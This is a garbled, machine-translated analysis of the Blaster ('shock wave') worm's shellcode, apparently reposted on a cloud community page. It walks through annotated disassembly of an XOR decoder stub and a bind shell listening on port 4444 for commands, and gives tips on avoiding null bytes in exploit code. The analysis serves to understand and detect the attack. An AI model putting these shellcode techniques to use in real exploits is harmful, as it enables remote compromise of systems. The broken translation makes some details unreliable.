2 years ago, when the "shock wave" virus broke out, I had an analysis of its shellcode, and now I gave it to the analysis I wrote,
Let's see what a generation of poison is. In general, Shellcode are written in this way, so long as the hook Shellcode must invoke the API to judge ESP and EIP
If the difference is within 0x1000 (that is, the code is running on the stack), you can basically confirm that the system is under a buffer overflow attack and that the process must exit immediately.
Of course, some of the more powerful shellcode using the direct call native Api,raw socket, and other technology, the hook API monitoring buffer Overflow attack method is not the spirit,
There are other ways to think about it, but in this case, it's a lot of volume, and it's hard to shellcode the system and its flaws.
In exploit, because you can't have 0 and 5C characters, be careful when writing code, because a lot of code has 0, like
; The Mov ecx,8 machine code is b9 08 00 00 00 has 3 0, so you must change to XOR Ecx,ecx/mov cl,8 or push 8/pop ecx or XOR ecx,ecx--sub ecx,-8
: 00401000 NOP
: 00401001 NOP
: 00401002 NOP
: 00401003 EB19 jmp 0040101E
: 00401005 5E pop esi; esi=00401023, the code starting at 00401023 addresses will be restored, actually the address that ESI points to is not fixed on the stack
: 00401006 31c9 xor ecx, ECX
: 00401008 81e989ffffff Sub ecx, ffffff89==-77; ecx=77h
: 0040100E 813680bf3294 xor dword ptr [esi], 9432bf80 Restore code encrypted from 00401023
: 00401014 81EEFCFFFFFF Sub esi, FFFFFFFC add esi,4
: 0040101A E2f2 Loop 0040100E
: 0040101C EB05 jmp 00401023; restore completed, skip to restored code
: 0040101E e8e2ffffff call 00401005; This instruction corresponds to the set of push 00401023,jmp 4,010,052 instructions
The code starting here has been restored:
: 00401023 83ec34 Sub ESP, 00000034
: 00401026 8BF4 mov esi, esp;esi--> variable table
: 004010FF Push EDI =0
: 00401100 Push EDI =0
: 00401101 680200115C push 5c110002;p ort=4444; sockaddr_in structure not completed, 4 bytes less
: 00401106 8BCC mov ecx, esp; ecx-->0200115c0000000000000000
: 00401108 6a16 push 00000016h; This parameter should be 10h.
: 0040110A i push ecx; ecx-->0200115c000000000000000
: 0040110B push ebx; hsocket
: 0040110C FF5620 call bind; Bind 4444 Port
: 0040110F Push EDI =0
: 00401110 push ebx; hsocket
: 00401111 FF5624 Call Listen 4444 ports begin to enter the listening state
: 00401114 Push EDI =0
: 00401115 may push ecx =0a2340; This argument seems to have a problem, can be 0
: 00401116 push ebx; hsocket
: 00401117 FF5628 call accept; accept the connection from the attack host and begin to receive the DOS command from the other side.
: 0040111A 8bd0 mov edx, eax =324h, handle of socket to translate
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
